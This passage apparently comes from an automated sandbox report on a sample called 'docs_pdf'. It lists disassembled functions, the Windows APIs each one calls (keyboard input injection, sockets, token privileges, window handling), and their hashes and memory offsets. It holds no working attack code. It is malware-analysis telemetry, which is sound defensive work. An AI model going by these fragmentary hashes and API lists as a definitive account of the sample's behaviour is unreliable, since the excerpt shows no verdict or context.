                                    • Opcode Fuzzy Hash: 287a6fe858e547e9a2e046fb3cd76f367a296e1bbdd6078ef55ec0d02a4a678f
                                    • Instruction Fuzzy Hash: C8C18A716083218FC754DF28C480A6ABBE4FF89714F14896EF9999B351EB34E905CF82
                                    Function 010283A8 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                    Download Yara Rule
                                    APIs
                                    • CoInitialize.OLE32(00000000), ref: 010283D8
                                    • CoUninitialize.OLE32 ref: 010283E3
                                      • Part of subcall function 0100DA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0100DAC5
                                    • VariantInit.OLEAUT32(?), ref: 010283EE
                                    • VariantClear.OLEAUT32(?), ref: 010286BF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                    • String ID:
                                    • API String ID: 780911581-0
                                    • Opcode ID: 8064145861dae9f8d6ae116c6b4caf64762cb697357e978788463498776c6b94
                                    • Instruction ID: cd7f8842e4e10ab2137442238086ed199cf9cf7c30a79fdaaab56d4145d5eeba
                                    • Opcode Fuzzy Hash: 8064145861dae9f8d6ae116c6b4caf64762cb697357e978788463498776c6b94
                                    • Instruction Fuzzy Hash: B4A14B792047219FDB50DF19C885B5ABBE4BF89314F04844DFA9A9B3A1CB74ED04CB52
                                    Function 01007A78 Relevance: 6.2, APIs: 4, Instructions: 231COMMON
                                    Download Yara Rule
                                    APIs
                                    • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,01042C7C,?), ref: 01007C32
                                    • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,01042C7C,?), ref: 01007C4A
                                    • CLSIDFromProgID.OLE32(?,?,00000000,0103FB80,000000FF,?,00000000,00000800,00000000,?,01042C7C,?), ref: 01007C6F
                                    • _memcmp.LIBCMT ref: 01007C90
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: FromProg$FreeTask_memcmp
                                    • String ID:
                                    • API String ID: 314563124-0
                                    • Opcode ID: 15c7f02744d809baab3fb7bdf310203ff3be2c9a44d90c90d6be80d301b6a352
                                    • Instruction ID: fd11988f3d83b2f7c83b4b03a5eb01d9ab1eb36a3704c38039b8c499a12341d7
                                    • Opcode Fuzzy Hash: 15c7f02744d809baab3fb7bdf310203ff3be2c9a44d90c90d6be80d301b6a352
                                    • Instruction Fuzzy Hash: F2814C71A00109EFDB05DF98C884EEEB7B9FF89315F204198F546AB250DB35AE05CB60
                                    Function 01006DF3 Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Variant$AllocClearCopyInitString
                                    • String ID:
                                    • API String ID: 2808897238-0
                                    • Opcode ID: 6fc351cada4ae44671c5fe00cb1bcbed6fd346b299e2ebb12a931a857ea23436
                                    • Instruction ID: c9bdd396634930e2d083cbf273ebd44c4d34239e8d48c77ec278de30c9352b7e
                                    • Opcode Fuzzy Hash: 6fc351cada4ae44671c5fe00cb1bcbed6fd346b299e2ebb12a931a857ea23436
                                    • Instruction Fuzzy Hash: 2751C334604302DAFB61AF69D890A7DB7E6AF08310F50881FE6D6CB2D1DB79A8548B01
                                    Function 01039A63 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetWindowRect.USER32(00B9D7B0,?), ref: 01039AD2
                                    • ScreenToClient.USER32(00000002,00000002), ref: 01039B05
                                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 01039B72
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Window$ClientMoveRectScreen
                                    • String ID:
                                    • API String ID: 3880355969-0
                                    • Opcode ID: 949bdfcccd8bb31bc61e21043a0077cf2f97a82e0895dfc0f79fdcf647418756
                                    • Instruction ID: faccd0cc6dfd7906820b55bd9ade344e6664d809b68c2cb6634d6a33a86a6e61
                                    • Opcode Fuzzy Hash: 949bdfcccd8bb31bc61e21043a0077cf2f97a82e0895dfc0f79fdcf647418756
                                    • Instruction Fuzzy Hash: E6519F34A00609EFDF65CF68D9809AE7BF9FF84324F108299F8959B291D771AD41CB90
                                    Function 01026CBD Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • socket.WSOCK32(00000002,00000002,00000011), ref: 01026CE4
                                    • WSAGetLastError.WSOCK32(00000000), ref: 01026CF4
                                      • Part of subcall function 00FB9997: __itow.LIBCMT ref: 00FB99C2
                                      • Part of subcall function 00FB9997: __swprintf.LIBCMT ref: 00FB9A0C
                                    • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 01026D58
                                    • WSAGetLastError.WSOCK32(00000000), ref: 01026D64
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ErrorLast$__itow__swprintfsocket
                                    • String ID:
                                    • API String ID: 2214342067-0
                                    • Opcode ID: 02a39f9c5729bda9fbda37256dcf52a574b8cd365fcddbeee61da68079eb2f21
                                    • Instruction ID: fe41ed4aff4ad4c159e76b1fe9a2392f73b530d0b89921678257606d327a14f1
                                    • Opcode Fuzzy Hash: 02a39f9c5729bda9fbda37256dcf52a574b8cd365fcddbeee61da68079eb2f21
                                    • Instruction Fuzzy Hash: 1D41F634B40210AFEB21BF25CC86F7A77E99F44B10F448058FA599B2C2DBB99C009B91
                                    Function 0102672D Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                    Download Yara Rule
                                    APIs
                                    • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0103F910), ref: 010267BA
                                    • _strlen.LIBCMT ref: 010267EC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: _strlen
                                    • String ID:
                                    • API String ID: 4218353326-0
                                    • Opcode ID: 32f6dc0ae0842dc9edc6c8d7fc898ef8c8fdffe98c7e1109e5ecfaceca595ff2
                                    • Instruction ID: 586181ba6dd62c0300bd9fd3e2eef3872173c69b2bfb2d2221d5f131e02a92bc
                                    • Opcode Fuzzy Hash: 32f6dc0ae0842dc9edc6c8d7fc898ef8c8fdffe98c7e1109e5ecfaceca595ff2
                                    • Instruction Fuzzy Hash: F4412270A00115ABCB14EBA5DCC0FEEB7EDEF48310F148269F9569B292DB79AD04CB50
                                    Function 0101BA5F Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0101BB09
                                    • GetLastError.KERNEL32(?,00000000), ref: 0101BB2F
                                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0101BB54
                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0101BB80
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                    • String ID:
                                    • API String ID: 3321077145-0
                                    • Opcode ID: 5de1be9948b0b215b9f485a0d8af7b1aea49a7f6356fb352cc73f73226b955e2
                                    • Instruction ID: db5257fd72f0c5a9b71e051d284502c7a91f2473746967a5eec34add5b41c213
                                    • Opcode Fuzzy Hash: 5de1be9948b0b215b9f485a0d8af7b1aea49a7f6356fb352cc73f73226b955e2
                                    • Instruction Fuzzy Hash: E3413939600611DFCB21EF19C584A9DBBF1EF49310B098488E98A9B766CB78FD01DF91
                                    Function 01038AC0 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                    Download Yara Rule
                                    APIs
                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 01038B4D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: InvalidateRect
                                    • String ID:
                                    • API String ID: 634782764-0
                                    • Opcode ID: c210e1e644501009bb3b9499e9767a0e27499e7fc1164becb1eee01157b7f6b0
                                    • Instruction ID: 9be9f5c35bc60fdb54fe25b57cc8fb7a5dccdd51cdc819c116b1fb0a87a1deb7
                                    • Opcode Fuzzy Hash: c210e1e644501009bb3b9499e9767a0e27499e7fc1164becb1eee01157b7f6b0
                                    • Instruction Fuzzy Hash: 9231B2B4600206BEFB699E28CC45FA93BACEB85310F14C7C3FBD1D6291C635A5408B51
                                    Function 0103ADF1 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • ClientToScreen.USER32(?,?), ref: 0103AE1A
                                    • GetWindowRect.USER32(?,?), ref: 0103AE90
                                    • PtInRect.USER32(?,?,0103C304), ref: 0103AEA0
                                    • MessageBeep.USER32(00000000), ref: 0103AF11
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Rect$BeepClientMessageScreenWindow
                                    • String ID:
                                    • API String ID: 1352109105-0
                                    • Opcode ID: d93df618baa6793ebc43a82435591f803931374762e7fec41e7069f95f82d5ec
                                    • Instruction ID: 5e5dc0f87029eeaa986ef3d6ffce56eb500cbbf1fcd884fafc9375d1c2f95a25
                                    • Opcode Fuzzy Hash: d93df618baa6793ebc43a82435591f803931374762e7fec41e7069f95f82d5ec
                                    • Instruction Fuzzy Hash: 67418E70B00119DFDB61CF58C484AA97BF9FB89340F1881A9E5D5DB255D732A842CF60
                                    Function 01010FE6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 01011037
                                    • SetKeyboardState.USER32(00000080,?,00000001), ref: 01011053
                                    • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 010110B9
                                    • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 0101110B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: KeyboardState$InputMessagePostSend
                                    • String ID:
                                    • API String ID: 432972143-0
                                    • Opcode ID: ff6cda3f6a61c7b6447490bc8b823ab39c3b60bb726aee1eab73af6caccbb221
                                    • Instruction ID: e498dac058bd7ada17558b6ce664751585a275ab511fbebb5e3e8ed5769469ac
                                    • Opcode Fuzzy Hash: ff6cda3f6a61c7b6447490bc8b823ab39c3b60bb726aee1eab73af6caccbb221
                                    • Instruction Fuzzy Hash: 9E311630F44698AAFB3A8A799C04BF9BBE9AB45310F04429AF7C0521D9C3BD45848792
                                    Function 01011121 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 01011176
                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 01011192
                                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 010111F1
                                    • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 01011243
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: KeyboardState$InputMessagePostSend
                                    • String ID:
                                    • API String ID: 432972143-0
                                    • Opcode ID: a9372479da1e6ea101f4989bfdaf7c3b461736611a70be3800bdd74ac4f01315
                                    • Instruction ID: 67966cee9ae8c42b9805810c081560e2422f04b9894a649d61a54a9dcbd703dd
                                    • Opcode Fuzzy Hash: a9372479da1e6ea101f4989bfdaf7c3b461736611a70be3800bdd74ac4f01315
                                    • Instruction Fuzzy Hash: BA314870E4060DAAFF398A798804BFEBBFAAB49310F04439AF6C0921D9D33D45958751
                                    Function 00FE6415 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00FE644B
                                    • __isleadbyte_l.LIBCMT ref: 00FE6479
                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00FE64A7
                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00FE64DD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                    • String ID:
                                    • API String ID: 3058430110-0
                                    • Opcode ID: 669b8879782f318fb99a82c093cc1c861932e11f7bd7785c19305e875015dcd9
                                    • Instruction ID: 64111632fc3e81b9386bf119b6d34e3d7310db90b9bf0dc6b23d2f87dfd98312
                                    • Opcode Fuzzy Hash: 669b8879782f318fb99a82c093cc1c861932e11f7bd7785c19305e875015dcd9
                                    • Instruction Fuzzy Hash: C631C131A0028EAFDB21CF66CC45BAA7BAAFF513A0F154429F854C71D1D735D850EB91
                                    Function 01035175 Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetForegroundWindow.USER32 ref: 01035189
                                      • Part of subcall function 0101387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 01013897
                                      • Part of subcall function 0101387D: GetCurrentThreadId.KERNEL32 ref: 0101389E
                                      • Part of subcall function 0101387D: AttachThreadInput.USER32(00000000,?,010152A7), ref: 010138A5
                                    • GetCaretPos.USER32(?), ref: 0103519A
                                    • ClientToScreen.USER32(00000000,?), ref: 010351D5
                                    • GetForegroundWindow.USER32 ref: 010351DB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                    • String ID:
                                    • API String ID: 2759813231-0
                                    • Opcode ID: 187ff2ecc9e5410877a4361b9ea207d90ba4b3beed5fb0b783ba2b26f5c1c639
                                    • Instruction ID: 4de1749d365dee4bab6466be32a8ec00151ba04aae871a05c23c87fba2676c4b
                                    • Opcode Fuzzy Hash: 187ff2ecc9e5410877a4361b9ea207d90ba4b3beed5fb0b783ba2b26f5c1c639
                                    • Instruction Fuzzy Hash: F5313A72900109ABDB00EFA6CC859EEB7FDEF99300F10406AE541E7241EA799A00CBA1
                                    Function 0103C788 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FB2612: GetWindowLongW.USER32(?,000000EB), ref: 00FB2623
                                    • GetCursorPos.USER32(?), ref: 0103C7C2
                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00FEBBFB,?,?,?,?,?), ref: 0103C7D7
                                    • GetCursorPos.USER32(?), ref: 0103C824
                                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00FEBBFB,?,?,?), ref: 0103C85E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                                    • String ID:
                                    • API String ID: 2864067406-0
                                    • Opcode ID: 968c5c16f4db7deb7560e1b33e60c6ebb461cc3cb0e7ac74a92df30075f5f5bb
                                    • Instruction ID: a7927db47a34600a33f818d9721378337a233055d03e9dcf96f0c0e2d335cfa5
                                    • Opcode Fuzzy Hash: 968c5c16f4db7deb7560e1b33e60c6ebb461cc3cb0e7ac74a92df30075f5f5bb
                                    • Instruction Fuzzy Hash: 8A31A535600018AFEB65CF59C898EEA7FFAFB49320F04419AFA85D7251C7365A50DF60
                                    Function 01008B9E Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 01008652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 01008669
                                      • Part of subcall function 01008652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 01008673
                                      • Part of subcall function 01008652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 01008682
                                      • Part of subcall function 01008652: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 01008689
                                      • Part of subcall function 01008652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0100869F
                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 01008BEB
                                    • _memcmp.LIBCMT ref: 01008C0E
                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 01008C44
                                    • HeapFree.KERNEL32(00000000), ref: 01008C4B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                    • String ID:
                                    • API String ID: 1592001646-0
                                    • Opcode ID: ac7e5507f8c06e5a62305c4898c4746458ab8de9f201b62a4428d729cff9fce3
                                    • Instruction ID: 0754a1568dea7e0fcd3c82350947af972476862b8f7e98df1b872bdc0b183345
                                    • Opcode Fuzzy Hash: ac7e5507f8c06e5a62305c4898c4746458ab8de9f201b62a4428d729cff9fce3
                                    • Instruction Fuzzy Hash: 79218D71E01209ABEB11CF98C944BEEBBF8FF44350F08809AE595A7280D731AA05CB51
                                    Function 00FD0BD0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                    Download Yara Rule
                                    APIs
                                    • __setmode.LIBCMT ref: 00FD0BF2
                                      • Part of subcall function 00FB5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,01017B20,?,?,00000000), ref: 00FB5B8C
                                      • Part of subcall function 00FB5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,01017B20,?,?,00000000,?,?), ref: 00FB5BB0
                                    • _fprintf.LIBCMT ref: 00FD0C29
                                    • OutputDebugStringW.KERNEL32(?), ref: 01006331
                                      • Part of subcall function 00FD4CDA: _flsall.LIBCMT ref: 00FD4CF3
                                    • __setmode.LIBCMT ref: 00FD0C5E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
